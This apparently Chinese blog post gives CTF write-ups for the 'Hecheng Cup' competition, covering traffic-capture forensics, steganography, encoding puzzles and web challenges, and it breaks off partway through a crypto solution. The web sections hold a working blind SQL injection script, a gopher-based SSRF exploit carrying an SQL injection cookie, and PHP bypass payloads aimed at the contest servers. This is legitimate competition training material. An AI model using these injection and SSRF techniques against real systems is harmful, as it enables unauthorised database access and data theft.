<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP | Hexo</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="# 首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP 公众号：Th0r安全@TOC">
<meta property="og:type" content="article">
<meta property="og:title" content="首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP">
<meta property="og:url" content="http://example.com/2022/01/05/%E9%A6%96%E5%B1%8A%E2%80%9C%E9%B9%A4%E5%9F%8E%E6%9D%AF%E2%80%9D%E6%B2%B3%E5%8D%97%C2%B7%E9%B9%A4%E5%A3%81CTF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8C%91%E6%88%98%E8%B5%9B%E9%83%A8%E5%88%86WP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="# 首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP 公众号：Th0r安全@TOC">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/3ad154595b4f46f9a1b76f1cf915f71c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/3f70dd896a314d7c91bd496014e7f0f2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2a63de023ea448cf8e751ac8aa8f5c0b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_18,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/4d2ffc4a6cd9454bbb2f344221627f14.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/f05d23e88bfa44a0b5c7c223f8432562.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/cef783e2ae494f57bf858ff1556d63b4.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/9fb2dc871484406e8492f29807f1a93f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/dff7ba0416bd4ee2b28631460923efbf.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/02f73fb390c64eddb7157658ed8bb014.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/0e0137dd63fe4ddfbebde03186c1ccc3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/d473618ae34b4aa78f260e69c0edaea0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/e885e24bfcfe4a039f6f1246ea8c5ece.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/e53dcf297b804df9bc8b0dd1e0a6ffd3.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/809017b9a81745b28962b4d84646da18.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/ed7e90700f474b248dc619d7f3824274.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2b5365230fb645a3836b2cd40bce3926.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="article:published_time" content="2022-01-05T14:39:18.199Z">
<meta property="article:modified_time" content="2022-01-05T14:42:32.945Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/3ad154595b4f46f9a1b76f1cf915f71c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16">
  
    <link rel="alternative" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 6.0.0"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="D:/比赛/博客搭建/Hexo/public/img/head.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="D:/比赛/博客搭建/Hexo/public/img/head.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛部分WP" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2022/01/05/%E9%A6%96%E5%B1%8A%E2%80%9C%E9%B9%A4%E5%9F%8E%E6%9D%AF%E2%80%9D%E6%B2%B3%E5%8D%97%C2%B7%E9%B9%A4%E5%A3%81CTF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8C%91%E6%88%98%E8%B5%9B%E9%83%A8%E5%88%86WP/" class="article-date">
  	<time datetime="2022-01-05T14:39:18.199Z" itemprop="datePublished">2022-01-05</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>﻿</p>
<p>﻿# 首届“鹤城杯”河南·鹤壁CTF网络安全挑战赛WP</p>
<p>公众号：Th0r安全<br>@<a href="%E6%96%87%E7%AB%A0%E7%9B%AE%E5%BD%95">TOC</a></p>
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">


<ul>
<li><h2 id="1"><a href="#1" class="headerlink" title="1"></a>1</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ tshark -r timu.pcapng http|grep <span class="string">&#x27; GET &#x27;</span> &gt; timu-get</span><br><span class="line">$ <span class="keyword">for</span> i <span class="keyword">in</span> `seq 1 30`; <span class="keyword">do</span> a=`grep <span class="string">&quot;),<span class="variable">$i</span>,1)&quot;</span> timu-get|tail -1|cut -d= -f3|cut -</span><br><span class="line">d- -f1`;b=`<span class="built_in">printf</span> <span class="string">&quot;%x&quot;</span> <span class="variable">$a</span>`;<span class="built_in">echo</span> -n <span class="variable">$b</span>; <span class="keyword">done</span></span><br><span class="line">666c61677b77317265736841524b5f657a5f31736e7469747d7e7e7e7e3c</span><br><span class="line">$ <span class="keyword">for</span> i <span class="keyword">in</span> `seq 1 30`; <span class="keyword">do</span> a=`grep <span class="string">&quot;),<span class="variable">$i</span>,1)&quot;</span> timu-get|tail -1|cut -d= -f3|cut -</span><br><span class="line">d- -f1`;b=`<span class="built_in">printf</span> <span class="string">&quot;%x&quot;</span> <span class="variable">$a</span>`;<span class="built_in">echo</span> -n <span class="variable">$b</span>; <span class="keyword">done</span>|xxd -p -r</span><br><span class="line">flag&#123;w1reshARK_ez_1sntit&#125;</span><br></pre></td></tr></table></figure></li>
<li><h2 id="2"><a href="#2" class="headerlink" title="2"></a>2</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ cat easy_crypto.txt </span><br><span class="line">公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法</span><br><span class="line">治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等</span><br><span class="line">敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民</span><br><span class="line">主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等</span><br><span class="line">平等自由平等富强法治诚信和谐</span><br><span class="line">http://www.hiencode.com/cvencode.html</span><br><span class="line">flag&#123;IlUqU9O5guX6YiITsRNPiQmbhNRjGuTP&#125;</span><br></pre></td></tr></table></figure>
<img src="https://img-blog.csdnimg.cn/3ad154595b4f46f9a1b76f1cf915f71c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></li>
<li><h2 id="3"><a href="#3" class="headerlink" title="3"></a>3</h2></li>
</ul>
<p>flag{W0w_y0u_c4n_rea11y_enc0d1ng!}<br><img src="https://img-blog.csdnimg.cn/3f70dd896a314d7c91bd496014e7f0f2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<ul>
<li><h2 id="4"><a href="#4" class="headerlink" title="4"></a>4</h2><img src="https://img-blog.csdnimg.cn/2a63de023ea448cf8e751ac8aa8f5c0b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_18,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>修改 png 文件的高后保存为 1a.png<br><img src="https://img-blog.csdnimg.cn/4d2ffc4a6cd9454bbb2f344221627f14.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/f05d23e88bfa44a0b5c7c223f8432562.png" alt="在这里插入图片描述"><br><a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1cG2QvYy3khpQGLfjfbYevg">https://pan.baidu.com/s/1cG2QvYy3khpQGLfjfbYevg</a><br>密码： cavb<br>下载 file.pcap 然后分析</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ strings file.pcap &gt; amisc.str1</span><br><span class="line">wqsemc@kali:~/l/00-hechengctf20211008$ <span class="keyword">for</span> i <span class="keyword">in</span> `seq 1 39`; <span class="keyword">do</span> a=`grep username </span><br><span class="line">amisc.str|grep <span class="string">&quot;%29%2C<span class="variable">$i</span>%2C1%29%29&quot;</span>|tail -1|awk -F<span class="string">&#x27;%2Csleep&#x27;</span> <span class="string">&#x27;&#123;print $1&#125;&#x27;</span>|awk -</span><br><span class="line">F<span class="string">&#x27;%29%29%3D&#x27;</span> <span class="string">&#x27;&#123;print $2&#125;&#x27;</span>`;b=`<span class="built_in">printf</span> %02x <span class="variable">$a</span>`;<span class="built_in">echo</span> -n <span class="variable">$b</span>; <span class="keyword">done</span></span><br><span class="line">666c61677b63643263336532666561343633646564396166383030643731353562653761717d7e</span><br><span class="line">wqsemc@kali:~/l/00-hechengctf20211008$ <span class="keyword">for</span> i <span class="keyword">in</span> `seq 1 39`; <span class="keyword">do</span> a=`grep username </span><br><span class="line">amisc.str|grep <span class="string">&quot;%29%2C<span class="variable">$i</span>%2C1%29%29&quot;</span>|tail -1|awk -F<span class="string">&#x27;%2Csleep&#x27;</span> <span class="string">&#x27;&#123;print $1&#125;&#x27;</span>|awk -</span><br><span class="line">F<span class="string">&#x27;%29%29%3D&#x27;</span> <span class="string">&#x27;&#123;print $2&#125;&#x27;</span>`;b=`<span class="built_in">printf</span> %02x <span class="variable">$a</span>`;<span class="built_in">echo</span> -n <span class="variable">$b</span>; <span class="keyword">done</span>|xxd -p -r</span><br><span class="line">flag&#123;cd2c3e2fea463ded9af800d7155be7aq&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><h2 id="5"><a href="#5" class="headerlink" title="5"></a>5</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$ zsteg check.png </span><br><span class="line">b1,r,lsb,xy .. text: </span><br><span class="line"><span class="string">&quot;CbBbBbCbFbBbFbGbGbGbBbCbGbGbGbCbCbBbFbCbCbGbGbCbCbGbFbCbCbG&quot;</span></span><br><span class="line">b1,rgb,lsb,xy .. text: </span><br><span class="line"><span class="string">&quot;&amp;#x66;&amp;#x6c;&amp;#x61;&amp;#x67;&amp;#x7b;&amp;#x68;&amp;#x30;&amp;#x77;&amp;#x5f;&amp;#x34;&amp;#x62;&amp;#x6f;&amp;#x75;</span></span><br><span class="line"><span class="string">&amp;#x54;&amp;#x5f;&amp;#x65;&amp;#x6e;&amp;#x63;&amp;#x30;&amp;#x64;&amp;#x65;&amp;#x5f;&amp;#x34;&amp;#x6e;&amp;#x64;&amp;#x5f;&amp;</span></span><br><span class="line"><span class="string">#x70;&amp;#x6e;&amp;#x47;&amp;#x7d;m&quot;</span></span><br><span class="line">$ <span class="built_in">echo</span> </span><br><span class="line"><span class="string">&quot;&amp;#x66;&amp;#x6c;&amp;#x61;&amp;#x67;&amp;#x7b;&amp;#x68;&amp;#x30;&amp;#x77;&amp;#x5f;&amp;#x34;&amp;#x62;&amp;#x6f;&amp;#x75;</span></span><br><span class="line"><span class="string">&amp;#x54;&amp;#x5f;&amp;#x65;&amp;#x6e;&amp;#x63;&amp;#x30;&amp;#x64;&amp;#x65;&amp;#x5f;&amp;#x34;&amp;#x6e;&amp;#x64;&amp;#x5f;&amp;</span></span><br><span class="line"><span class="string">#x70;&amp;#x6e;&amp;#x47;&amp;#x7d;m&quot;</span>|sed <span class="string">&#x27;s/&amp;#//g&#x27;</span>|sed <span class="string">&#x27;s#;##g&#x27;</span>|xxd -p -r</span><br><span class="line">flag&#123;h0w_4bouT_enc0de_4nd_pnG&#125;</span><br></pre></td></tr></table></figure></li>
</ul>
<ul>
<li><h2 id="easy-sql-2"><a href="#easy-sql-2" class="headerlink" title="easy_sql_2"></a>easy_sql_2</h2>登录功能，post传username和password。尝试admin,admin弱口令登录成功但是提示flag并不在这里。username尝试 -1’||’1’%23 发现是password error!，因此猜测后端的应该是根据传入的username查出对应的password，查到了就不再是username error!，然后讲传入的password进行一次md5后与这个password比较，相同就登录成功。尝试SQL注入，但是ban了select，因此利用table注入。数据库名的话很好注入，直接不用table用regexp也可以注出是ctf了，然后开始注表名。虽然过滤了tables，但是columns没有过滤，可以利用informaion_schema.columns来盲注出表名：</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">-1<span class="string">&#x27;||</span></span><br><span class="line"><span class="string">((&#x27;</span>def<span class="string">&#x27;,&#x27;</span>ctf<span class="string">&#x27;,&#x27;</span>fl11aag<span class="string">&#x27;,&#x27;</span><span class="string">&#x27;,&#x27;</span><span class="string">&#x27;,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)</span></span><br><span class="line"><span class="string">&lt;(table/**/information_schema.columns/**/limit/**/3,1))#</span></span><br></pre></td></tr></table></figure>
<p>按位一次爆破即可得到fl11aag ，列名的话不重要就不爆了。<br>然后就是爆内容，经过测试只有一列，但是却有2行数据，第一行数据是假flag：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1<span class="string">&#x27;||((binary/**/&#123;&#125;)&lt;(table/**/ctf.fl11aag/**/limit/**/1,1))#</span></span><br></pre></td></tr></table></figure>
<p>写个脚本爆破即可，脚本没有对最后一位进行处理，爆出结果后手动改一下即可：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">strtohex</span>(<span class="params">s</span>):</span></span><br><span class="line">ss = <span class="string">&quot;0x&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">ss += <span class="built_in">str</span>(<span class="built_in">hex</span>(<span class="built_in">ord</span>(i))).replace(<span class="string">&quot;0x&quot;</span>,<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"><span class="keyword">return</span> ss</span><br><span class="line">url=<span class="string">&quot;http://182.116.62.85:26571/login.php&quot;</span></span><br><span class="line">flag=<span class="string">&quot;flag&#123;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10000</span>):</span><br><span class="line"><span class="comment">#for j in &quot;.-0123456789abcdefghijklmnopqrstuvwxyz0123456789&#123;|&#125;~&quot;:</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">19</span>,<span class="number">128</span>):</span><br><span class="line"><span class="comment">#payload=&quot;-1&#x27;||</span></span><br><span class="line">((<span class="string">&#x27;def&#x27;</span>,<span class="string">&#x27;ctf&#x27;</span>,<span class="string">&#x27;fl11aag&#x27;</span>,<span class="string">&#x27;&#123;&#125;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">9</span>,<span class="number">10</span>,<span class="number">11</span>,<span class="number">12</span>,<span class="number">13</span>,<span class="number">14</span>,<span class="number">15</span>,<span class="number">16</span>,<span class="number">17</span>,<span class="number">18</span>,<span class="number">19</span>,<span class="number">20</span>,<span class="number">21</span>,<span class="number">22</span>)</span><br><span class="line">&lt;(table/**/information_schema.columns/**/limit/**/<span class="number">3</span>,<span class="number">1</span>))<span class="comment">#&quot;.format(flag+j)</span></span><br><span class="line">payload=<span class="string">&quot;-1&#x27;||((binary/**/&#123;&#125;)</span></span><br><span class="line"><span class="string">&lt;(table/**/ctf.fl11aag/**/limit/**/1,1))#&quot;</span>.<span class="built_in">format</span>(strtohex(flag+<span class="built_in">chr</span>(j)))</span><br><span class="line">data=&#123;</span><br><span class="line"><span class="string">&quot;username&quot;</span>:payload,</span><br><span class="line"><span class="string">&quot;password&quot;</span>:<span class="string">&quot;1&quot;</span></span><br><span class="line">&#125;</span><br><span class="line">r=requests.post(url=url,data=data)</span><br><span class="line"><span class="comment">#print(r.text)</span></span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;username&quot;</span> <span class="keyword">in</span> r.text <span class="keyword">and</span> <span class="string">&quot;try&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> r.text:</span><br><span class="line"><span class="comment">#print(r.text)</span></span><br><span class="line"><span class="comment">#print(payload)</span></span><br><span class="line"><span class="comment">#print(j)</span></span><br><span class="line">flag+=<span class="built_in">chr</span>(j-<span class="number">1</span>)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"><span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<ul>
<li><h2 id="middle-magic"><a href="#middle-magic" class="headerlink" title="middle_magic"></a>middle_magic</h2>没啥好说的。。。。考了一遍又一遍的trick。</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?aaa=%0apass_the_level_1%<span class="number">23</span></span><br><span class="line">admin[]=<span class="number">1</span>&amp;root_pwd[]=<span class="number">2</span>&amp;level_3=&#123;<span class="string">&quot;result&quot;</span>:<span class="number">0</span>&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><h2 id="easy-sql-1"><a href="#easy-sql-1" class="headerlink" title="easy_sql_1"></a>easy_sql_1</h2>老登录界面，说不是inner所以不行，f12看到use.php，进去有个ssrf，利用gopher协议打post然后adminadmin登录后发现给了cookie: this_is_your_cookie=YWRtaW4= ，把cookie带上再经过一些尝试发现post没什么回显，尝试cookie是不是可以注入，将admin’ base64加密后填上去再访问，直接SQL语句报错，用的sqli-labs的库，直接报错注出flag即可：</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> quote</span><br><span class="line">data=<span class="string">&quot;&quot;&quot;POST / HTTP/1.1</span></span><br><span class="line"><span class="string">Host: 127.0.0.1:80</span></span><br><span class="line"><span class="string">Content-Type: application/x-www-form-urlencoded</span></span><br><span class="line"><span class="string">Cookie:</span></span><br><span class="line"><span class="string">this_is_your_cookie=LTEnKXx8dXBkYXRleG1sKDEsY29uY2F0KDEsKHNlbGVjdCBncm91cF9jb25j</span></span><br><span class="line"><span class="string">YXQoZmxhZykgZnJvbSBmbGFnKSwxKSwxKSM=;PHPSESSID=susn9dj4f1806v0pl5oiureek1;</span></span><br><span class="line"><span class="string">Content-Length: &#123;&#125;</span></span><br><span class="line"><span class="string">&#123;&#125;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">payload=<span class="string">&quot;uname=admin&amp;passwd=admin&quot;</span></span><br><span class="line">length=<span class="built_in">len</span>(payload)</span><br><span class="line">data=data.<span class="built_in">format</span>(length,payload)</span><br><span class="line">data=quote(data,<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">url=<span class="string">&quot;http://182.116.62.85:28303/use.php&quot;</span></span><br><span class="line">params=&#123;</span><br><span class="line"><span class="string">&#x27;url&#x27;</span>:<span class="string">&quot;gopher://127.0.0.1:80/_&quot;</span>+data</span><br><span class="line">&#125;</span><br><span class="line">headers=&#123;</span><br><span class="line"><span class="string">&#x27;Cookie&#x27;</span>:<span class="string">&quot;PHPSESSID=8t4ppbs8ek3l5v5estgbttqtu3&quot;</span></span><br><span class="line">&#125;</span><br><span class="line">r=requests.get(url,params=params,headers=headers)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>

<ul>
<li><h2 id="EasyPHP"><a href="#EasyPHP" class="headerlink" title="EasyPHP"></a>EasyPHP</h2>原题魔改，参考连接：<code>https://www.gem-love.com/ctf/1898.html</code><br>直接打： <code>http://182.116.62.85:21895/index.php/utils.php/%81?show[source</code></li>
<li><h2 id="Spring"><a href="#Spring" class="headerlink" title="Spring"></a>Spring</h2>原题魔改照着敲，参考链接：<code>http://blog.cyberpeace.cn/Spring-Web-Flow/</code><br><img src="https://img-blog.csdnimg.cn/cef783e2ae494f57bf858ff1556d63b4.png" alt="在这里插入图片描述"></li>
</ul>
<ul>
<li><h2 id="easy-crypto"><a href="#easy-crypto" class="headerlink" title="easy_crypto"></a>easy_crypto</h2>附件：<br>公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐<br>社 会 主 义 核 心 价 值 观 加 密 ， 在 线 解<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.atoolbox.net/Tool.php?Id=850</span><br></pre></td></tr></table></figure></li>
<li><h2 id="a-crypto"><a href="#a-crypto" class="headerlink" title="a_crypto"></a>a_crypto</h2>附件：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35</span><br></pre></td></tr></table></figure>
ROT13 编码，解码后得</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35</span><br></pre></td></tr></table></figure>
<p>16 进制串转字符串得</p>
